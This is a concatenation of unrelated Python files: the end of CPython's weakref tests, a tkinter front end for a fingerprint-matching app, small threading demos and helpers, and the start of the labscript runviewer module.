self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
app_gui.py
|
#
# Supports both CLI and GUI execution.
# Pass -h to see the available options.
# Author: Xiaohei
# Updatetime: 2021-12-01
#
import argparse
import os  # used by the os.path / os.getcwd / os.listdir calls below
from pathlib import Path
import sys
import subprocess
import shlex
import threading
import tkinter as tk
from tkinter import messagebox as mb
from tkinter import filedialog as fd
from tkinter import simpledialog as sd
from tkinter import ttk
from myapp import *
DEFAULT_DATA_PATH = "./data/"
CONFIG_UNSET = "Not set"
# Indexed on feature name, tuple contains the C file, the H file and the Cmake project name for the feature
GUI_TEXT = 0
C_FILE = 1
H_FILE = 2
LIB_NAME = 3
DEFINES = 0
INITIALISERS = 1
class Parameters:
def __init__(self, _img, _data, gui):
self.imgPath = _img
self.dataPath = _data
self.wantGUI = gui
def GetBackground():
return "white"
def GetButtonBackground():
return "white"
def GetTextColour():
return "black"
def GetButtonTextColour():
return "#c51a4a"
def RunGUI(_args):
root = tk.Tk()
style = ttk.Style(root)
style.theme_use("default")
ttk.Style().configure(
"TButton",
padding=6,
relief="groove",
border=2,
foreground=GetButtonTextColour(),
background=GetButtonBackground(),
)
ttk.Style().configure(
"TLabel", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TCheckbutton", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TRadiobutton", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TLabelframe", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TLabelframe.Label", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TCombobox", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TListbox", foreground=GetTextColour(), background=GetBackground()
)
app = ProjectWindow(root, _args)
app.configure(background=GetBackground())
root.mainloop()
sys.exit(0)
def RunWarning(message):
    mb.showwarning("Fingerprint Recognition", message)
sys.exit(0)
def ShowResult(message):
    mb.showinfo("Fingerprint Recognition", message)
class ChecklistBox(tk.Frame):
def __init__(self, parent, entries):
tk.Frame.__init__(self, parent)
self.vars = []
for c in entries:
# This var will be automatically updated by the checkbox
# The checkbox fills the var with the "onvalue" and "offvalue" as
# it is clicked on and off
var = tk.StringVar(value="") # Off by default for the moment
self.vars.append(var)
cb = ttk.Checkbutton(
self, var=var, text=c, onvalue=c, offvalue="", width=20
)
cb.pack(side="top", fill="x", anchor="w")
def getCheckedItems(self):
values = []
for var in self.vars:
value = var.get()
if value:
values.append(value)
return values
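# A minimal usage sketch for ChecklistBox (illustrative only; `root` and the
# entry strings below are assumptions, not part of this application):
#
#     root = tk.Tk()
#     box = ChecklistBox(root, ["Option A", "Option B", "Option C"])
#     box.pack()
#     # ...after the user has ticked some boxes...
#     selected = box.getCheckedItems()   # e.g. ["Option A", "Option C"]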
def thread_function(text, command, ok):
l = shlex.split(command)
proc = subprocess.Popen(l, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in iter(proc.stdout.readline, ""):
if not line:
if ok:
ok["state"] = tk.NORMAL
return
text.insert(tk.END, line)
text.see(tk.END)
# Function to run an OS command and display the output in a new modal window
class DisplayWindow(tk.Toplevel):
def __init__(self, parent, title):
tk.Toplevel.__init__(self, parent)
self.parent = parent
self.text = None
self.OKButton = None
self.init_window(title)
def init_window(self, title):
self.title(title)
frame = tk.Frame(self, borderwidth=5, relief=tk.RIDGE)
frame.pack(fill=tk.X, expand=True, side=tk.TOP)
scrollbar = tk.Scrollbar(frame)
self.text = tk.Text(frame, bg="gray14", fg="gray99")
scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
self.text.pack(side=tk.LEFT, fill=tk.Y)
scrollbar.config(command=self.text.yview)
self.text.config(yscrollcommand=scrollbar.set)
frame1 = tk.Frame(self, borderwidth=1)
frame1.pack(fill=tk.X, expand=True, side=tk.BOTTOM)
self.OKButton = ttk.Button(frame1, text="OK", command=self.OK)
self.OKButton["state"] = tk.DISABLED
self.OKButton.pack()
# make dialog modal
self.transient(self.parent)
self.grab_set()
def OK(self):
self.destroy()
def RunCommandInWindow(parent, command):
w = DisplayWindow(parent, command)
x = threading.Thread(target=thread_function, args=(w.text, command, w.OKButton))
x.start()
parent.wait_window(w)
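# Illustrative call for RunCommandInWindow (a sketch; the parent widget and the
# command string are assumptions, not part of this application). It opens a modal
# window, streams the command's combined stdout/stderr into it, and enables the
# OK button once the command finishes:
#
#     RunCommandInWindow(app, "ping -c 4 127.0.0.1")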
class EditBoolWindow(sd.Dialog):
def __init__(self, parent, configitem, current):
self.parent = parent
self.config_item = configitem
self.current = current
sd.Dialog.__init__(self, parent, "Edit boolean configuration")
def body(self, master):
self.configure(background=GetBackground())
ttk.Label(self, text=self.config_item["name"]).pack()
self.result = tk.StringVar()
self.result.set(self.current)
ttk.Radiobutton(master, text="True", variable=self.result, value="True").pack(
anchor=tk.W
)
ttk.Radiobutton(master, text="False", variable=self.result, value="False").pack(
anchor=tk.W
)
ttk.Radiobutton(
master, text=CONFIG_UNSET, variable=self.result, value=CONFIG_UNSET
).pack(anchor=tk.W)
def get(self):
return self.result.get()
class EditIntWindow(sd.Dialog):
def __init__(self, parent, configitem, current):
self.parent = parent
self.config_item = configitem
self.current = current
self.input = None
sd.Dialog.__init__(self, parent, "Edit integer configuration")
def body(self, master):
self.configure(background=GetBackground())
_str = (
self.config_item["name"]
+ " Max = "
+ self.config_item["max"]
+ " Min = "
+ self.config_item["min"]
)
ttk.Label(self, text=_str).pack()
self.input = tk.Entry(self)
self.input.pack(pady=4)
self.input.insert(0, self.current)
ttk.Button(self, text=CONFIG_UNSET, command=self.unset).pack(pady=5)
def validate(self):
self.result = self.input.get()
# Check for numeric entry
return True
def unset(self):
self.result = CONFIG_UNSET
self.destroy()
def get(self):
return self.result
class EditEnumWindow(sd.Dialog):
def __init__(self, parent, configitem, current):
self.parent = parent
self.config_item = configitem
self.current = current
self.input = None
sd.Dialog.__init__(self, parent, "Edit Enumeration configuration")
def body(self, master):
# self.configure(background=GetBackground())
values = self.config_item["enumvalues"].split("|")
values.insert(0, "Not set")
self.input = ttk.Combobox(self, values=values, state="readonly")
self.input.set(self.current)
self.input.pack(pady=12)
def validate(self):
self.result = self.input.get()
return True
def get(self):
return self.result
def _get_filepath(filename):
return os.path.join(os.path.dirname(__file__), filename)
# Our main window
class ProjectWindow(tk.Frame):
def __init__(self, parent, _args):
tk.Frame.__init__(self, parent)
self.master = parent
self.help = None
self.logo = None
self.imgPath = None
self.dataPath = None
self.init_window()
def init_window(self):
        self.master.title("Fingerprint Recognition")
self.master.configure(bg=GetBackground())
mainFrame = tk.Frame(self, bg=GetBackground()).grid(
row=0, column=0, columnspan=6, rowspan=12
)
# Need to keep a reference to the image or it will not appear.
self.logo = tk.PhotoImage(file=_get_filepath("logo.png"))
logowidget = ttk.Label(
mainFrame, image=self.logo, borderwidth=0, relief="solid"
).grid(row=0, column=0, columnspan=5, pady=10)
# Set image path
imglbl = ttk.Label(mainFrame, text="Image path:").grid(
row=2, column=0, sticky=tk.E
)
self.imgPath = tk.StringVar()
self.imgPath.set(os.getcwd())
imgEntry = ttk.Entry(mainFrame, textvariable=self.imgPath).grid(
row=2, column=1, columnspan=3, sticky=tk.W + tk.E, padx=5
)
imgBrowse = ttk.Button(
mainFrame, text="Browse", command=self.browseImgPath
).grid(row=2, column=4)
# Set data path
datalbl = ttk.Label(mainFrame, text="Data path:").grid(
row=3, column=0, sticky=tk.E
)
self.dataPath = tk.StringVar()
self.dataPath.set(os.getcwd())
dataEntry = ttk.Entry(mainFrame, textvariable=self.dataPath).grid(
row=3, column=1, columnspan=3, sticky=tk.W + tk.E, padx=5
)
dataBrowse = ttk.Button(
mainFrame, text="Browse", command=self.browseDataPath
).grid(row=3, column=4)
# OK, Cancel, Help section
# creating buttons
QuitButton = ttk.Button(mainFrame, text="Quit", command=self.quit).grid(
row=5, column=4
)
OKButton = ttk.Button(mainFrame, text="OK", command=self.OK).grid(
row=5, column=3
)
# TODO help not implemented yet
# HelpButton = ttk.Button(mainFrame, text="Help", command=self.help).grid(row=5, column=0, pady=5)
        # You can set a default path here, replace the string with wherever you want.
self.imgPath.set("./image/101_1.tif")
self.dataPath.set("./data/")
def quit(self):
# TODO Check if we want to exit here
sys.exit(0)
def OK(self):
# OK, grab all the settings from the page, then call the generators
_imgPath = self.imgPath.get()
_dataPath = self.dataPath.get()
p = Parameters(_img=Path(_imgPath), _data=Path(_dataPath), gui=True)
DoEverything(self, p)
def browseImgPath(self):
name = fd.askopenfilename(
initialdir="./image/",
title="Select image file",
filetypes=[
("All files", ".*"),
("TIFF files", ".tiff .tif"),
("Windows bitmaps", ".bmp .dib"),
("JPEG files", ".jpeg .jpg .jpe"),
("JPEG 2000 files", ".jp2"),
("Portable Network Graphics", ".png"),
("WebP", ".webp"),
("Portable image format", ".pbm .pgm .ppm .pxm .pnm"),
("PFM files", ".pfm"),
("Sun rasters", ".sr .ras"),
("OpenEXR Image files", ".exr"),
("Radiance HDR", ".hdr .pic"),
],
)
self.imgPath.set(os.path.relpath(name))
def browseDataPath(self):
name = fd.askdirectory(
initialdir="./data/",
title="Select data folder",
)
self.dataPath.set(os.path.relpath(name))
def help(self):
self.help = None
print("Help TODO")
def CheckImgPath(gui, _img):
_imgPath = os.path.exists(Path(_img))
    # os.path.exists() returns a bool (never None), so test for falsity here
    if not _imgPath:
        m = "Unable to locate the image file."
        if gui:
            RunWarning(m)
        else:
            print(m)
        _imgPath = None
elif not os.path.isfile(Path(_img)):
m = "Unable to locate the image file, --image does not point to a file."
if gui:
RunWarning(m)
else:
print(m)
_imgPath = None
return _imgPath
def CheckDataPath(gui, _data):
_dataPath = os.path.exists(Path(_data))
    # os.path.exists() returns a bool (never None), so test for falsity here
    if not _dataPath:
        m = "Unable to locate the data folder."
        if gui:
            RunWarning(m)
        else:
            print(m)
        _dataPath = None
elif not os.path.isdir(Path(_data)):
m = "Unable to locate the data folder, --data does not point to a folder."
if gui:
RunWarning(m)
else:
print(m)
_dataPath = None
return _dataPath
def ParseCommandLine():
    parser = argparse.ArgumentParser(description="Fingerprint Recognition")
parser.add_argument(
"-d", "--data", help="Select an alternative data folder", default="./data/"
)
parser.add_argument("-i", "--image", help="Select a fingerprint image to recognize")
parser.add_argument(
"-g",
"--gui",
action="store_true",
        help="Run a GUI version of the fingerprint recognition",
)
return parser.parse_args()
def LoadDataDir(path):
address_lst = os.listdir(path)
name_lst = list(address_lst)
return name_lst
def DoEverything(parent, params):
    # Bail out if the data path does not exist or is not a directory
    if not (os.path.exists(params.dataPath) and os.path.isdir(params.dataPath)):
if params.wantGUI:
mb.showerror(
"Fingerprint Recognization",
"Invalid data path. Select a valid path and try again!",
)
return
else:
print("Invalid data path!\n")
sys.exit(-1)
name_lst = LoadDataDir(params.dataPath)
# print("img: ")
# print(params.imgPath)
# print("data: ")
# print(params.dataPath)
print("name_lst: ")
print(name_lst)
flag, name = run_app(str(params.imgPath), str(params.dataPath))
if flag:
m = "Fingerprint matches: {}".format(name)
if params.wantGUI:
ShowResult(m)
else:
print(m)
elif not name == "None":
m = "Fingerprint does not match. Most likely: {}".format(name)
if params.wantGUI:
ShowResult(m)
else:
print(m)
else:
m = "Empty database."
if params.wantGUI:
ShowResult(m)
else:
print(m)
###################################################################################
# main execution starteth here
args = ParseCommandLine()
# TODO Do both warnings in the same error message so the user doesn't have to keep coming back to find still more to do
if args.image is None and not args.gui:
print("No image path specfied.\n")
sys.exit(-1)
if args.gui:
RunGUI(args) # does not return, only exits
img = CheckImgPath(args.gui, args.image)
if img is None:
sys.exit(-1)
imgPath = Path(args.image)
data = CheckDataPath(args.gui, args.data)
if data is None:
if not os.path.isdir(Path(DEFAULT_DATA_PATH)):
os.mkdir(Path(DEFAULT_DATA_PATH))
dataPath = Path(DEFAULT_DATA_PATH)
else:
dataPath = Path(args.data)
p = Parameters(_img=imgPath, _data=dataPath, gui=False)
DoEverything(None, p)
|
multithread2.py
|
'''
Using multiple threads - simulating several download tasks.
'''
from random import randint
from threading import Thread
from time import time, sleep
def download_task(filename):
    print('Started downloading %s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
    print('%s finished downloading! Took %d seconds.' % (filename, time_to_download))
def main():
start = time()
thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',))
thread1.start()
thread2 = Thread(target=download_task, args=('Peking Hot.avi',))
thread2.start()
thread1.join()
thread2.join()
end = time()
    print('Total time elapsed: %.3f seconds.' % (end - start))
if __name__ == '__main__':
main()
|
threading_support.py
|
# -*- coding: utf-8 -*-
from threading import Event, Thread
def call_repeatedly(intervalSec, func, *args):
stopped = Event()
def loop():
        while not stopped.wait(intervalSec):  # the first call happens after intervalSec seconds
func(*args)
Thread(target=loop).start()
return stopped.set
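# A minimal usage sketch for call_repeatedly (illustrative only; `heartbeat` is a
# hypothetical function, not part of this module). The returned value is the
# Event's set method, so calling it stops the loop on its next wait():
#
#     def heartbeat():
#         print("still alive")
#     cancel = call_repeatedly(2.0, heartbeat)   # run heartbeat() every 2 seconds
#     # ... later ...
#     cancel()   # sets the Event; the background thread exits after its current wait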
from time import sleep
from timeit import default_timer as timer
def timeDurationNoRet(logger, sleepTime = 1.0):
def decorator(func):
def wrapper(*args, **kwargs):
try:
startTime = timer()
func(*args, **kwargs)
elapsed = timer() - startTime
if float(sleepTime) > (elapsed):
sleep(float(sleepTime) - float(elapsed))
return
except Exception as inst:
# log the exception
err = "There was an exception in {}. msg:{}".format(func.__name__, inst.args)
logger.error(err)
return
return wrapper
return decorator
def timeDuration(logger, sleepTime = 1.0):
def decorator(func):
def wrapper(*args, **kwargs):
try:
startTime = timer()
retValue = func(*args, **kwargs)
elapsed = timer() - startTime
if float(sleepTime) > (elapsed):
sleep(float(sleepTime) - float(elapsed))
return retValue
except Exception as inst:
# log the exception
err = "There was an exception in {}. msg:{}".format(func.__name__, inst.args)
logger.error(err)
return None
return wrapper
return decorator
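# A minimal usage sketch for the decorators above (illustrative only; the logger
# setup and `poll_status` are assumptions, not part of this module). Each call is
# padded to take at least `sleepTime` seconds, which suits fixed-rate polling loops:
#
#     import logging
#     logging.basicConfig()
#     log = logging.getLogger(__name__)
#
#     @timeDuration(log, sleepTime=1.0)
#     def poll_status():
#         return "ok"
#
#     status = poll_status()   # returns "ok"; the call never finishes in under ~1 second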
|
__main__.py
|
#####################################################################
# #
# /main.pyw #
# #
# Copyright 2014, Monash University #
# #
# This file is part of the program runviewer, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
import os
import sys
import time
import threading
import logging
import ctypes
import socket
if PY2:
str = unicode
from Queue import Queue
else:
from queue import Queue
import ast
import pprint
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
import labscript_utils.excepthook
# Set working directory to runviewer folder, resolving symlinks
runviewer_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runviewer_dir)
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.6.1', '3')
check_version('qtutils', '2.0.0', '3.0.0')
check_version('zprocess', '1.1.2', '3')
from labscript_utils.setup_logging import setup_logging
logger = setup_logging('runviewer')
labscript_utils.excepthook.set_logger(logger)
from zprocess import zmq_get, ZMQServer
import zprocess.locking
import labscript_utils.h5_lock
import h5py
zprocess.locking.set_client_process_name('runviewer')
# This check must be postponed until after the h5_lock import.
# This is because the check imports pyqtgraph, which imports h5py;
# h5py must be imported after h5_lock, thus we do the check here.
check_version('pyqtgraph', '0.9.10', '1')
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
from qtutils.qt.QtCore import pyqtSignal as Signal
import numpy
from scipy import interpolate
# must be imported after PySide/PyQt4
import pyqtgraph as pg
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
from qtutils import *
import qtutils.icons
from labscript_utils.connections import ConnectionTable
import labscript_devices
from labscript_utils.labconfig import LabConfig, config_prefix
from runviewer.resample import resample as _resample
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runviewer.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
